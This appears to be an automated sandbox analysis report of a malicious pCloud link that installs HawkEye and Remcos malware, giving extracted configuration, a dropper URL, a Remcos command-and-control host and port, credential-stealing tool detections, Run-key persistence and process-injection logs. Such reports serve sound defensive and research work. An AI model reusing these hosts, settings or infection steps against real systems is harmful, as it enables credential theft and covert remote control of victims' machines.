hawkeye | hxxps://u[.]pcloud[.]com/trackmail?url=aHR0cHM6Ly90cmFuc2Zlci5wY2xvdWQuY29tL2Rvd25sb2FkLmh0bWw%2FY29kZT01WlRmYlgwWjRGTTBMcTlNYXNmWnQwTDNaVndiMWh3U1lhVlIyTFgwRGpVeEcwNGlEcUZ6WCM%3D&token=j7yZZ7ZpkZrwc0kENluc4wtObKMPkdF8xn5b07

Resubmissions

11-01-2024 11:28

240111-nk7kesehdq 1

11-01-2024 11:22

240111-ng3gaseggm 10

Analysis

max time kernel
131s
max time network
163s
platform
windows11-21h2_x64
resource
win11-20231215-en
resource tags

arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
submitted
11-01-2024 11:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://u.pcloud.com/trackmail?url=aHR0cHM6Ly90cmFuc2Zlci5wY2xvdWQuY29tL2Rvd25sb2FkLmh0bWw%2FY29kZT01WlRmYlgwWjRGTTBMcTlNYXNmWnQwTDNaVndiMWh3U1lhVlIyTFgwRGpVeEcwNGlEcUZ6WCM%3D&token=j7yZZ7ZpkZrwc0kENluc4wtObKMPkdF8xn5b07

Score

10^/10

hawkeye remcos remnew collection keylogger persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://wallpapercave.com/uwp/uwp4203994.png

exe.dropper

https://wallpapercave.com/uwp/uwp4203994.png

Extracted

Family

remcos

Botnet

RemNew

subrmsserver.duckdns.org:46252

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc75253245245745252454-WRO7SU
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
keylogger trojan stealer spyware hawkeye
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/5124-461-0x0000000000400000-0x0000000000457000-memory.dmp	MailPassView
behavioral1/memory/5124-559-0x0000000000400000-0x0000000000457000-memory.dmp	MailPassView
behavioral1/memory/3440-560-0x0000000000400000-0x0000000000457000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/6112-452-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/6112-503-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/1632-534-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 9 IoCs

resource	yara_rule
behavioral1/memory/6112-452-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/5124-461-0x0000000000400000-0x0000000000457000-memory.dmp	Nirsoft
behavioral1/memory/5304-463-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/5304-491-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/6112-503-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1632-534-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/5768-533-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/5124-559-0x0000000000400000-0x0000000000457000-memory.dmp	Nirsoft
behavioral1/memory/3440-560-0x0000000000400000-0x0000000000457000-memory.dmp	Nirsoft

Blocklisted process makes network request 3 IoCs

flow	pid	Process
100	2760	WScript.exe
102	228	powershell.exe
122	228	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	AddInProcess32.exe
Key opened	\REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	AddInProcess32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\VbsName.vbs"	powershell.exe

Drops file in System32 directory 9 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_726cea1f0f349cf7\machine.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_585900615f764770\usbport.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_5ab7d1c25144fcab\msmouse.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_8207ba80cf22e40a\hdaudbus.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_702fdf2336d2162d\input.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\keyboard.inf_amd64_cc6edbde0940344f\keyboard.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_84ea762c0a90c362\mshdc.PNF	dxdiag.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 228 set thread context of 5696	228	powershell.exe	125
PID 5696 set thread context of 6112	5696	AddInProcess32.exe	128
PID 5696 set thread context of 5124	5696	AddInProcess32.exe	132
PID 5696 set thread context of 5304	5696	AddInProcess32.exe	131
PID 5696 set thread context of 1632	5696	AddInProcess32.exe	137
PID 5696 set thread context of 3440	5696	AddInProcess32.exe	139
PID 5696 set thread context of 5768	5696	AddInProcess32.exe	140

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	dxdiag.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	dxdiag.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	dxdiag.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	dxdiag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	dxdiag.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID	dxdiag.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133494458236595156"	chrome.exe

Modifies registry class 37 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove\ = "Programmable"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32	dxdiag.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1199853020-417986905-91977573-1000\{69744F9E-6006-4FF9-9033-8A5E0A2154E4}	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\ProgID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer	dxdiag.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1199853020-417986905-91977573-1000\{1F9B15B6-FF9C-46AB-82B9-E76D1671C7D2}	dxdiag.exe
Key created	\REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000_Classes\Local Settings	chrome.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\ = "DxDiagClassObject Class"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\ = "DxDiagClassObject Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\ = "DxDiagProvider Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\SysWOW64\\dxdiagn.dll"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID\ = "DxDiag.DxDiagClassObject"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\ = "DxDiagProvider Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\VersionIndependentProgID	dxdiag.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

pid	Process
1576	chrome.exe
1576	chrome.exe
4516	powershell.exe
4516	powershell.exe
4516	powershell.exe
228	powershell.exe
228	powershell.exe
228	powershell.exe
3064	msedge.exe
3064	msedge.exe
1220	msedge.exe
1220	msedge.exe
5376	powershell.exe
5376	powershell.exe
5376	powershell.exe
5884	msedge.exe
5884	msedge.exe
6112	AddInProcess32.exe
6112	AddInProcess32.exe
5304	AddInProcess32.exe
6112	AddInProcess32.exe
5304	AddInProcess32.exe
6112	AddInProcess32.exe
1632	AddInProcess32.exe
1632	AddInProcess32.exe
1632	AddInProcess32.exe
1632	AddInProcess32.exe
5768	AddInProcess32.exe
5768	AddInProcess32.exe
5936	identity_helper.exe
5936	identity_helper.exe
3444	dxdiag.exe
3444	dxdiag.exe
2796	chrome.exe
2796	chrome.exe

Suspicious behavior: MapViewOfSection 11 IoCs

pid	Process
5696	AddInProcess32.exe
5696	AddInProcess32.exe
5696	AddInProcess32.exe
5696	AddInProcess32.exe
5696	AddInProcess32.exe
5696	AddInProcess32.exe
5696	AddInProcess32.exe
5696	AddInProcess32.exe
5696	AddInProcess32.exe
5696	AddInProcess32.exe
5696	AddInProcess32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe
Token: SeShutdownPrivilege	1576	chrome.exe
Token: SeCreatePagefilePrivilege	1576	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
1576	chrome.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe
3064	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
5696	AddInProcess32.exe
3444	dxdiag.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1576 wrote to memory of 4000	1576	chrome.exe	42
PID 1576 wrote to memory of 4000	1576	chrome.exe	42
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4164	1576	chrome.exe	81
PID 1576 wrote to memory of 4412	1576	chrome.exe	80
PID 1576 wrote to memory of 4412	1576	chrome.exe	80
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82
PID 1576 wrote to memory of 956	1576	chrome.exe	82

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://u.pcloud.com/trackmail?url=aHR0cHM6Ly90cmFuc2Zlci5wY2xvdWQuY29tL2Rvd25sb2FkLmh0bWw%2FY29kZT01WlRmYlgwWjRGTTBMcTlNYXNmWnQwTDNaVndiMWh3U1lhVlIyTFgwRGpVeEcwNGlEcUZ6WCM%3D&token=j7yZZ7ZpkZrwc0kENluc4wtObKMPkdF8xn5b07
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff93bcd9758,0x7ff93bcd9768,0x7ff93bcd9778
  2⤵
  PID:4000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1900 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:8
  2⤵
  PID:4412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:2
  2⤵
  PID:4164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2196 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:8
  2⤵
  PID:956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3164 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:1
  2⤵
  PID:3236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=1836,i,17774842143251342346,4921540910181807651,131072 /prefetch:1
  2⤵
  PID:4732
- C:\Program Files\Google\Chrome\Application\chrome.exe
